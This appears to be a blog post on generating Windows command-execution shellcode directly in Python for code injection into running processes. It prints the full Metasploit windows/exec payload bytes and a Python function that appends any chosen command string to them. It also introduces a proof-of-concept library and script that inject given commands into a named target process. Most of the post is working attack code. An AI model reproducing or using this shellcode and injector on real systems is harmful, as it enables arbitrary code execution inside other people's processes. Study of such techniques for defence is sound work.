In my previous post "Code injection on Windows using Python: a simple example", i've explored the ctype python library and the usage of Windows API in order to perform a code injection on 32bit systems.

All tests was performed using shellcodes generated by metasploit or found on some online repository, i ask myself:

"Is it possible to generate the shellcode directly into my python script?"

Well, "It Could Work!"

I examined the output of metaspolit "exec" module

msf payload(windows/exec) > set cmd calc.exe
cmd => calc.exe
msf payload(windows/exec) > generate
# windows/exec - 193 bytes
# http://www.metasploit.com
# VERBOSE=false, PrependMigrate=false, EXITFUNC=thread,
# CMD=calc.exe
buf =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" +
"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" +
"\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3" +
"\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" +
"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58" +
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3" +
"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a" +
"\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d" +
"\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb" +
"\xe0\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c" +
"\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53" +
"\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00""

and i tryed to manipulate it, in order to dinamically pass the command string.

Reading some documentation and comparing different generated payloads, i discover that the executed command is contained into the highlighted string, between "\xd5" and "\x00"

And here my simple and inelegant, solution:

def generateShellcode(cmdString):
    # Windows Exec Shellcode Sourced from the Metasploit Framework 
    # http://www.rapid7.com/db/modules/payload/windows/exec

    shellcode = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" + \
    "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" + \
    "\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" + \
    "\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" + \
    "\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3" + \
    "\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" + \
    "\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58" + \
    "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3" + \
    "\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a" + \
    "\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d" + \
    "\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb" + \
    "\xe0\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c" + \
    "\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53" + \
    "\xff\xd5" + cmdString + "\x00" 
    return shellcode

So, i've packed the "shellcode generator" and the injection routine developed in the previous post into a library that i named (with a very little imagination!) "pycodeinjector".

In the git repository is also available a simple script, pycIndolor.py, which can be used to test the library:

      |________|_____________________|_
      |        | | | | | | | | | | | | |________________
      |________|_P_y_c_I_n_d_o_l_o_r_|_|
      |        |                   |

        Simple PoC for pycodeinjection library

        Proudly developed by Andrea Fortuna
        andrea@andreafortuna.org
        https://www.andreafortuna.org

python pycIndolor.exe  <process to inject> <commands to inject>

Simply start the script passing target process and commands to inject and wait.

Obviously the library is in a very early development stage: the actual aim is update it with any new discovery that i will find.

References and further readings